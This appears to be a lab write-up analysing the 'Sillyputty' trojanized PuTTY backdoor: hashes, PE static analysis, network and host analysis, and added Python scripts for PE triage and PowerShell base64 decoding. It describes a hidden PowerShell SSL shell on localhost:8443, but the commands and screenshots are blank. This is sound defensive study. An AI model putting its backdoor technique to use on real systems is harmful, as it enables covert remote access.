Challenge-Sillyputty

Malware Details


Name - putty.exe.malz
Type - Backdoor

Hashes


MD5 -

	md5sum.exe putty.exe.malz

Output - 334a10500feb0f3444bf2e86ab2e76da *putty.exe.malz

SHA256 -

	sha256sum.exe putty.exe.malz

Output - 0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83 *putty.exe.malz

Virustotal results - Malicious

Architecture of binary - Intel x86

Static Analysis


Strings-

Tool used - FLOSS

Command -

Screenshot-->

Interesting Strings-->

IAT analysis-

Tools used - PEview

Interesting results -->

The malware is a Windows Portable Executable (PE) file.

Looking at the IMAGE_SECTION_HEADER for .text we get:

Virtual size and size of raw data are approximately the same, so the binary is not packed.

A large number of libraries and APIs are imported, which also indicates that the binary is unpacked (a packer would typically leave only a handful of imports for the unpacking stub).

For further analysis, open PEstudio.
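The two triage checks used above (verifying the file hashes, then comparing VirtualSize against SizeOfRawData per section and reading the machine type from the COFF header) can be scripted without pefile. The following is an added example for this writeup, not part of the challenge material or any tool named here; it walks the PE headers with `struct` and runs the writeup's packing heuristic on a constructed, minimal PE blob (`build_sample_pe`, synthetic data with an empty optional header, not the real putty.exe.malz). The tolerance value in `packing_hint` is an assumption; sections such as .data that legitimately contain uninitialised space can also show a large VirtualSize, so the hint is a lead, not a verdict.

```python
import hashlib
import struct

# Machine values from the PE/COFF specification
IMAGE_FILE_MACHINE = {0x14C: "Intel x86 (i386)", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}

# Known hashes of the sample, copied from the writeup above
KNOWN_MD5 = "334a10500feb0f3444bf2e86ab2e76da"
KNOWN_SHA256 = "0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83"


def file_hashes(data: bytes) -> dict:
    """MD5 and SHA256 of the raw bytes, the same values md5sum/sha256sum print."""
    return {"md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest()}


def matches_known_sample(data: bytes) -> bool:
    """True only if both hashes match the values recorded in the writeup."""
    h = file_hashes(data)
    return h["md5"] == KNOWN_MD5 and h["sha256"] == KNOWN_SHA256


def parse_pe_sections(data: bytes):
    """Return (machine_name, [section dicts]) by walking DOS header -> PE signature -> COFF -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # offset of the PE signature
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, num_sections, _ts, _symtab, _nsyms, opt_size, _chars = struct.unpack_from("<HHIIIHH", data, coff)
    sec_table = coff + 20 + opt_size                              # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = sec_table + i * 40                                  # each IMAGE_SECTION_HEADER is 40 bytes
        name, vsize, vaddr, rawsize, rawptr, _rel, _ln, _nrel, _nln, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, off)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "raw_size": rawsize,
            "characteristics": chars,
        })
    return IMAGE_FILE_MACHINE.get(machine, hex(machine)), sections


def packing_hint(section: dict, tolerance: float = 0.5) -> str:
    """The writeup's heuristic: VirtualSize much larger than SizeOfRawData suggests data unpacked at runtime.
    tolerance is an assumed threshold (50% growth); tune it per corpus."""
    raw, vs = section["raw_size"], section["virtual_size"]
    if raw == 0:
        return "suspicious (no raw data, section is filled at runtime)"
    if vs / raw > 1 + tolerance:
        return "suspicious (virtual size much larger than raw data)"
    return "normal (sizes roughly equal)"


def build_sample_pe() -> bytes:
    """Constructed minimal PE: one normal-looking .text section and one .data section that grows in memory."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102) # i386, 2 sections, empty optional header
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x1234, 0x1000, 0x1400, 0x400, 0, 0, 0, 0, 0x60000020)
    data = struct.pack("<8sIIIIIIHHI", b".data", 0x20000, 0x3000, 0x400, 0x1800, 0, 0, 0, 0, 0xC0000040)
    return dos + b"PE\0\0" + coff + text + data


def triage(data: bytes) -> dict:
    """Summary a first-pass analyst would record: hashes, architecture and per-section packing hints."""
    machine, sections = parse_pe_sections(data)
    return {
        "hashes": file_hashes(data),
        "known_sample": matches_known_sample(data),
        "machine": machine,
        "sections": {s["name"]: packing_hint(s) for s in sections},
    }


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key}: {value}")
```

To run it on a real file, replace `build_sample_pe()` with the bytes read from the sample; `triage` raises on anything that is not a PE, which is itself useful when a ".exe" turns out to be something else.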

Bringing it all together-

Tools used - PEstudio

Interesting results -->

Potential Malware indicators -->

File-header (intel-386) -->

Flagged IAT Imports-->

Out of 326 imports in total, 51 were flagged as malicious, most of them related to windowing and execution. This alone proves nothing, since the legitimate PuTTY program also uses these APIs.

Dynamic Analysis


Initial detonation

Without network - A blue PowerShell window pops up and closes itself immediately.

A normal PuTTY window then opens. Most probably the malware detected the sandbox.

With network -

The same happens on detonation of the sample.

Network Analysis

Tools used - INetSim and Wireshark.

After detonation, capturing the malware's packets -

We see HTTP requests for 3 files, one after the other, in Wireshark -

And a DNS request -->

for the domain address-->

This domain does not resolve in our lab network, so we edit the hosts file to point it at the Windows box.

Command-->

Host Analysis

Tools used - Procmon, TCPView

We fire up Procmon and detonate the malware.

A lot of processes load up. Looking at the process tree we get -

A PowerShell command is running in the background. This must be the blue window we saw at the beginning. The command is -

There is also a conhost.exe (console host) running under PowerShell, which must host the above command. This is a command for a remote shell, which the malware author is likely using to gain access.

We can conclude that this is a backdoor.

Decoding the base64 string shows that the malware opens a port on localhost:8443 and only communicates over SSL/HTTPS. So, in order to interact with the shell, we type -
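The decoding step above is easy to get wrong: a PowerShell `-EncodedCommand` payload is base64 of UTF-16LE text, so a plain base64 decode shows every other character as a null byte. The following added example (not part of the writeup or of any tool it uses) detects the encoding from the decoded bytes, recovers the script, and pulls out the host, port and a few execution/network keywords a defender would want in a report. The keyword list is an illustrative assumption, and `SAMPLE_COMMAND` is a constructed, harmless stand-in for the real command, which the writeup does not reproduce.

```python
import base64
import re

# Assumed, illustrative list of tokens worth flagging in decoded PowerShell; extend per environment
SUSPICIOUS_TOKENS = ("TCPClient", "SslStream", "Invoke-Expression", "IEX", "DownloadString",
                     "-NonInteractive", "-WindowStyle Hidden")

# Constructed sample command: references localhost:8443 like the writeup, but only prints text
SAMPLE_COMMAND = '$h = \'localhost\'; $p = 8443; Write-Output "constructed sample: $h port $p"'


def encode_powershell(cmd: str) -> str:
    """Produce what powershell.exe -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_powershell_b64(b64: str) -> str:
    """Decode base64 and pick the text encoding by looking at the byte pattern."""
    raw = base64.b64decode(b64, validate=True)
    # UTF-16LE of ASCII text has a 0x00 in every odd position; require more than half of them
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")


def extract_indicators(script: str) -> dict:
    """Hosts quoted in the script, plausible port numbers, and any flagged keywords."""
    hosts = set(re.findall(
        r"['\"]([A-Za-z0-9][A-Za-z0-9.-]+\.[A-Za-z]{2,}|localhost|(?:\d{1,3}\.){3}\d{1,3})['\"]", script))
    ports = {int(p) for p in re.findall(r"\b(\d{2,5})\b", script) if 1 <= int(p) <= 65535}
    lowered = script.lower()
    tokens = [t for t in SUSPICIOUS_TOKENS if t.lower() in lowered]
    return {"hosts": sorted(hosts), "ports": sorted(ports), "tokens": tokens}


# Constructed plain (UTF-8) base64 sample, to show the decoder handles both encodings
SAMPLE_PLAIN_B64 = base64.b64encode(b"Get-Date").decode("ascii")


if __name__ == "__main__":
    encoded = encode_powershell(SAMPLE_COMMAND)
    script = decode_powershell_b64(encoded)
    print("decoded:", script)
    print("indicators:", extract_indicators(script))
```

Feed the base64 string captured from the Procmon command line into `decode_powershell_b64`; the `validate=True` flag makes stray characters copied from a screenshot fail loudly instead of silently producing garbage.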

We run both the command and the malware and we get the shell -
